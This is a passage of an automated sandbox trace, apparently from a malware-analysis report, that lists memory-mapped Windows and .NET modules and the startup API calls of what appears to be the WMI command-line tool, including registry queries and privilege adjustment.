"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\1a0039f0915836d939d771d7abc21893\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\1a0039f0915836d939d771d7abc21893\\system.transactions.ni.dll") Region: id = 1460 start_va = 0x7ffbf1740000 end_va = 0x7ffbf17e8fff entry_point = 0x7ffbf1740000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\5a3b55817db1f9d796b9b41c9ab92853\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\5a3b55817db1f9d796b9b41c9ab92853\\microsoft.wsman.management.ni.dll") Region: id = 1461 start_va = 0x7ffbf17f0000 end_va = 0x7ffbf1822fff entry_point = 0x7ffbf17f0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\system.configuration.install.ni.dll") Region: id = 1462 start_va = 0x7ffbf1830000 end_va = 0x7ffbf1898fff entry_point = 0x7ffbf1830000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\bb0e04744a248fac351d492d487895da\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\bb0e04744a248fac351d492d487895da\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 1463 start_va = 0x7ffbf18a0000 end_va = 0x7ffbf1bcffff entry_point = 0x7ffbf18a0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\system.core.ni.dll") Region: id = 1464 start_va = 0x233fc630000 end_va = 0x233fc82ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc630000" filename = "" Region: id = 1465 start_va = 0x7ffbf11b0000 end_va = 0x7ffbf11b6fff entry_point = 0x7ffbf11b0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 1466 start_va = 0x7ffbf11c0000 end_va = 0x7ffbf11fdfff entry_point = 0x7ffbf11c0000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\40c9953e749f0757ce67ecbdfe12f613\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\40c9953e749f0757ce67ecbdfe12f613\\microsoft.powershell.security.ni.dll") Region: id = 1467 start_va = 0x7ffbf1200000 end_va = 0x7ffbf124bfff entry_point = 0x7ffbf1200000 region_type = mapped_file name = "system.serviceprocess.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.ServiceProce#\\4e4b553cb8528abca787c6e0821e2a0f\\System.ServiceProcess.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.serviceproce#\\4e4b553cb8528abca787c6e0821e2a0f\\system.serviceprocess.ni.dll") Region: id = 1468 start_va = 0x7ffbf1250000 end_va = 0x7ffbf1367fff entry_point = 0x7ffbf1250000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\e89252939b60e0b094732d516aabfb1f\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\e89252939b60e0b094732d516aabfb1f\\microsoft.powershell.commands.management.ni.dll") Region: id = 1469 start_va = 0x7ffbf1370000 end_va = 0x7ffbf1421fff entry_point = 0x7ffbf1370000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\807cdbb97f8470d00364b0e411435df1\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\807cdbb97f8470d00364b0e411435df1\\microsoft.powershell.consolehost.ni.dll") Region: id = 1470 start_va = 0x7ffbf1430000 end_va = 0x7ffbf1645fff entry_point = 0x7ffbf1430000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\microsoft.powershell.commands.utility.ni.dll") Region: id = 1471 start_va = 0x7ffc07fd0000 end_va = 0x7ffc07fdbfff entry_point = 0x7ffc07fd0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1472 start_va = 0x233e14b0000 end_va = 0x233e14c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e14b0000" filename = "" Region: id = 1473 start_va = 0x233e14e0000 end_va = 0x233e14effff entry_point = 0x0 region_type = private name = "private_0x00000233e14e0000" filename = "" Region: id = 1474 start_va = 0x233fc830000 end_va = 0x233fc83ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc830000" filename = "" Region: id = 1475 start_va = 0x7ffb962b0000 end_va = 0x7ffb962bffff entry_point = 0x0 region_type = private name = "private_0x00007ffb962b0000" filename = "" Region: id = 1476 start_va = 0x7ffb962c0000 end_va = 0x7ffb962cffff entry_point = 0x0 region_type = private name = "private_0x00007ffb962c0000" filename = "" Region: id = 1477 start_va = 0x7ffb962d0000 end_va = 0x7ffb962dffff entry_point = 0x0 region_type = private name = "private_0x00007ffb962d0000" filename = "" Region: id = 1478 start_va = 0x7ffb962e0000 end_va = 0x7ffb962effff entry_point = 0x0 region_type = private name = "private_0x00007ffb962e0000" filename = "" Region: id = 1479 start_va = 0x3501010000 end_va = 0x350199ffff entry_point = 0x0 region_type = private name = "private_0x0000003501010000" filename = "" Region: id = 1480 start_va = 0x7ffbf6590000 end_va = 0x7ffbf66d6fff entry_point = 0x7ffbf6590000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\d150bbe1b49ee54e3c69b476754f88b9\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\d150bbe1b49ee54e3c69b476754f88b9\\system.configuration.ni.dll") Region: id = 1481 start_va = 0x233fc840000 end_va = 0x233fc85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc840000" filename = "" Region: id = 1482 start_va = 0x7ffb962f0000 end_va = 0x7ffb962fffff entry_point = 0x0 region_type = private name = "private_0x00007ffb962f0000" filename = "" Region: id = 1483 start_va = 0x7ffbf10f0000 end_va = 0x7ffbf11a9fff entry_point = 0x7ffbf10f0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1484 start_va = 0x7ffbf6940000 end_va = 0x7ffbf6967fff entry_point = 0x7ffbf6940000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1485 start_va = 0x7ffc0cc10000 end_va = 0x7ffc0cc23fff entry_point = 0x7ffc0cc10000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1486 start_va = 0x35019a0000 end_va = 0x3501a1ffff entry_point = 0x0 region_type = private name = "private_0x00000035019a0000" filename = "" Region: id = 1487 start_va = 0x7ffc0c510000 end_va = 0x7ffc0c525fff entry_point = 0x7ffc0c510000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1488 start_va = 0x7ffc0c4f0000 end_va = 0x7ffc0c509fff entry_point = 0x7ffc0c4f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1489 start_va = 0x3501a20000 end_va = 0x3501a9ffff entry_point = 0x0 region_type = private name = "private_0x0000003501a20000" filename = "" Region: id = 1490 start_va = 0x233fc860000 end_va = 0x233fc862fff entry_point = 0x233fc860000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1491 start_va = 0x7ffc12a20000 end_va = 0x7ffc12a43fff entry_point = 0x7ffc12a20000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1492 start_va = 0x7ffc03c60000 end_va = 0x7ffc03c8efff entry_point = 0x7ffc03c60000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1493 start_va = 0x3501aa0000 end_va = 0x3501b1ffff entry_point = 0x0 region_type = private name = "private_0x0000003501aa0000" filename = "" Region: id = 1494 start_va = 0x7ffc03f90000 end_va = 0x7ffc0400ffff entry_point = 0x7ffc03f90000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1495 start_va = 0x233e14a0000 end_va = 0x233e14a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e14a0000" filename = "" Region: id = 1496 start_va = 0x7ffbf6920000 end_va = 0x7ffbf693efff entry_point = 0x7ffbf6920000 region_type = mapped_file name = "shfusion.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\shfusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusion.dll") Region: id = 1497 start_va = 0x7ffbf76c0000 end_va = 0x7ffbf7769fff entry_point = 0x7ffbf76c0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll") Region: id = 1498 start_va = 0x233e14e0000 end_va = 0x233e14e6fff entry_point = 0x0 region_type = private name = "private_0x00000233e14e0000" filename = "" Region: id = 1499 start_va = 0x233fc830000 end_va = 0x233fc830fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc830000" filename = "" Region: id = 1500 start_va = 0x233fc9b0000 end_va = 0x233fc9bffff entry_point = 0x0 region_type = private name = "private_0x00000233fc9b0000" filename = "" Region: id = 1501 start_va = 0x7ffbf6910000 end_va = 0x7ffbf6916fff entry_point = 0x7ffbf6910000 region_type = mapped_file name = "fusion.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\fusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\fusion.dll") Region: id = 1502 start_va = 0x233fc870000 end_va = 0x233fc870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc870000" filename = "" Region: id = 1503 start_va = 0x7ffbf6900000 end_va = 0x7ffbf6909fff entry_point = 0x7ffbf6900000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 1504 start_va = 0x233fc880000 end_va = 0x233fc880fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc880000" filename = "" Region: id = 1505 start_va = 0x7ffbf6570000 end_va = 0x7ffbf6588fff entry_point = 0x7ffbf6570000 region_type = mapped_file name = "shfusres.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ShFusRes.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusres.dll") Region: id = 1506 start_va = 0x233fc890000 end_va = 0x233fc890fff entry_point = 0x0 region_type = private name = "private_0x00000233fc890000" filename = "" Region: id = 1507 start_va = 0x233fc8a0000 end_va = 0x233fc8e3fff entry_point = 0x233fc8a0000 region_type = mapped_file name = "system.security.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll") Region: id = 1508 start_va = 0x233fc8f0000 end_va = 0x233fc933fff entry_point = 0x233fc8f0000 region_type = mapped_file name = "system.security.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll") Region: id = 1509 start_va = 0x233fc940000 end_va = 0x233fc94ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc940000" filename = "" Region: id = 1510 start_va = 0x7ffb96300000 end_va = 0x7ffb9630ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96300000" filename = "" Region: id = 1511 start_va = 0x7ffb96310000 end_va = 0x7ffb9631ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96310000" filename = "" Region: id = 1512 start_va = 0x7ffbf68f0000 end_va = 0x7ffbf68fcfff entry_point = 0x7ffbf68f0000 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\wminet_utils.dll") Region: id = 1513 start_va = 0x233fc950000 end_va = 0x233fc950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc950000" filename = "" Region: id = 1514 start_va = 0x233fc960000 end_va = 0x233fc966fff entry_point = 0x0 region_type = private name = "private_0x00000233fc960000" filename = "" Region: id = 1515 start_va = 0x233fc970000 end_va = 0x233fc97ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc970000" filename = "" Region: id = 1516 start_va = 0x233fc980000 end_va = 0x233fc98ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc980000" filename = "" Region: id = 1517 start_va = 0x233fc990000 end_va = 0x233fc99ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc990000" filename = "" Region: id = 1518 start_va = 0x233fc9a0000 end_va = 0x233fc9affff entry_point = 0x0 region_type = private name = "private_0x00000233fc9a0000" filename = "" Region: id = 1519 start_va = 0x233fc980000 end_va = 0x233fc98ffff entry_point = 0x0 region_type = private name = "private_0x00000233fc980000" filename = "" Region: id = 1520 start_va = 0x7ffc06ac0000 end_va = 0x7ffc06ad5fff entry_point = 0x7ffc06ac0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1521 start_va = 0x7ffc06ae0000 end_va = 0x7ffc06af9fff entry_point = 0x7ffc06ae0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1522 start_va = 0x7ffc0ff80000 end_va = 0x7ffc0ff97fff entry_point = 0x7ffc0ff80000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1523 start_va = 0x7ffc06b00000 end_va = 0x7ffc06b0cfff entry_point = 0x7ffc06b00000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Thread: id = 39 os_tid = 0xdf0 [0049.198] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff66e670000 [0049.198] __set_app_type (_Type=0x1) [0049.198] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff66e6b1aa0) returned 0x0 [0049.198] __wgetmainargs (in: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268, _DoWildCard=0, _StartInfo=0x7ff66e6da274 | out: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268) returned 0 [0049.200] ??0CHString@@QEAA@XZ () returned 0x7ff66e6da9b0 [0049.201] ??0CHString@@QEAA@XZ () returned 0x7ff66e6dae60 [0049.202] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c [0049.202] SetConsoleCtrlHandler (HandlerRoutine=0x7ff66e6aa570, Add=1) returned 1 [0049.202] _onexit (_Func=0x7ff66e6bcd20) returned 0x7ff66e6bcd20 [0049.202] _onexit (_Func=0x7ff66e6bce30) returned 0x7ff66e6bce30 [0049.202] _onexit (_Func=0x7ff66e6bce70) returned 0x7ff66e6bce70 [0049.202] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0049.202] ResolveDelayLoadedAPI () returned 0x7ffc16032c50 [0049.202] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0049.618] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0049.628] CoCreateInstance (in: rclsid=0x7ff66e6c3568*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3578*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7ff66e6da840 | out: ppv=0x7ff66e6da840*=0x233e12241d0) returned 0x0 [0049.642] GetCurrentProcess () returned 0xffffffffffffffff [0049.642] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x350027f6c0 | out: TokenHandle=0x350027f6c0*=0x13c) returned 1 [0049.643] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350027f6b8 | out: TokenInformation=0x0, ReturnLength=0x350027f6b8) returned 0 [0049.643] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x233e14f5d80, TokenInformationLength=0x40, ReturnLength=0x350027f6b8 | out: TokenInformation=0x233e14f5d80, ReturnLength=0x350027f6b8) returned 1 [0049.643] AdjustTokenPrivileges (in: TokenHandle=0x13c, DisableAllPrivileges=0, NewState=0x233e14f5d80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x42002e, Luid.HighPart=1370819342, Attributes=0x75e0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0049.643] CloseHandle (hObject=0x13c) returned 1 [0049.645] SetThreadUILanguage (LangId=0x0) returned 0x409 [0049.646] _vsnwprintf (in: _Buffer=0x233e14f5e20, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x350027f3c8 | out: _Buffer="ms_409") returned 6 [0049.647] GetComputerNameW (in: lpBuffer=0x233e14f5e70, nSize=0x350027f6c8 | out: lpBuffer="X2VS1CUM", nSize=0x350027f6c8) returned 1 [0049.647] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.647] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.647] ResolveDelayLoadedAPI () returned 0x7ffc136a3fa0 [0049.647] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x350027f6c0 | out: lpNameBuffer=0x0, nSize=0x350027f6c0) returned 0x3500014000 [0049.648] GetLastError () returned 0xea [0049.648] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e14f5ec0, nSize=0x350027f6c0 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027f6c0) returned 0x1 [0049.648] lstrlenW (lpString="") returned 0 [0049.648] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3 [0049.650] lstrlenW (lpString=".") returned 1 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2=".", cchCount2=1) returned 3 [0049.650] lstrlenW (lpString="LOCALHOST") returned 9 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 3 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="X2VS1CUM", cchCount2=8) returned 2 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] lstrlenW (lpString="X2VS1CUM") returned 8 [0049.650] ResolveDelayLoadedAPI () returned 0x7ffc16fc09f0 [0049.652] SysStringLen (param_1="IDENTIFY") returned 0x8 [0049.652] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0049.652] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0049.652] SysStringLen (param_1="IDENTIFY") returned 0x8 [0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb [0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb [0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8 [0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8 [0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb [0049.653] SysStringLen (param_1="DELEGATE") returned 0x8 [0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8 [0049.653] SysStringLen (param_1="DELEGATE") returned 0x8 [0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0049.653] SysStringLen (param_1="DELEGATE") returned 0x8 [0049.653] SysStringLen (param_1="NONE") returned 0x4 [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="NONE") returned 0x4 [0049.653] SysStringLen (param_1="CONNECT") returned 0x7 [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="CALL") returned 0x4 [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="CALL") returned 0x4 [0049.653] SysStringLen (param_1="CONNECT") returned 0x7 [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="NONE") returned 0x4 [0049.653] SysStringLen (param_1="NONE") returned 0x4 [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="NONE") returned 0x4 [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0049.653] SysStringLen (param_1="DEFAULT") returned 0x7 [0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0049.653] SysStringLen (param_1="PKT") returned 0x3 [0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0049.654] GetSystemDirectoryW (in: lpBuffer=0x233e14f7cd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.654] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0049.654] SysStringLen (param_1="\\wbem\\") returned 0x6 [0049.654] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0049.654] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0049.654] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0049.654] GetCurrentThreadId () returned 0xdf0 [0049.654] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x350027efc0 | out: phkResult=0x350027efc0*=0x144) returned 0x0 [0049.654] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x350027f010, lpcbData=0x350027efb0*=0x400 | out: lpType=0x0, lpData=0x350027f010*=0x30, lpcbData=0x350027efb0*=0x4) returned 0x0 [0049.654] _wcsicmp (_String1="0", _String2="1") returned -1 [0049.654] _wcsicmp (_String1="0", _String2="2") returned -2 [0049.654] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x350027efb0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x350027efb0*=0x42) returned 0x0 [0049.655] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x233e14f80e0, lpcbData=0x350027efb0*=0x42 | out: lpType=0x0, lpData=0x233e14f80e0*=0x25, lpcbData=0x350027efb0*=0x42) returned 0x0 [0049.655] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0049.655] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0049.655] RegQueryValueExW (in: hKey=0x144, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x350027f010, lpcbData=0x350027efb0*=0x400 | out: lpType=0x0, lpData=0x350027f010*=0x36, lpcbData=0x350027efb0*=0xc) returned 0x0 [0049.655] _wtol (_String="65536") returned 65536 [0049.655] RegCloseKey (hKey=0x0) returned 0x6 [0049.655] CoCreateInstance (in: rclsid=0x7ff66e6c35c8*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c35d8*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x350027f4b8 | out: ppv=0x350027f4b8*=0x233e1a26f20) returned 0x0 [0049.892] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x233e1a26f20, xmlSource=0x350027f5f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x350027f670 | out: isSuccessful=0x350027f670*=0xffff) returned 0x0 [0050.167] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x233e1a26f20, DOMElement=0x350027f4c0 | out: DOMElement=0x350027f4c0*=0x233e1a294a0) returned 0x0 [0050.168] IXMLDOMElement:getElementsByTagName (in: This=0x233e1a294a0, tagName="XSLFORMAT", resultList=0x350027f4b0 | 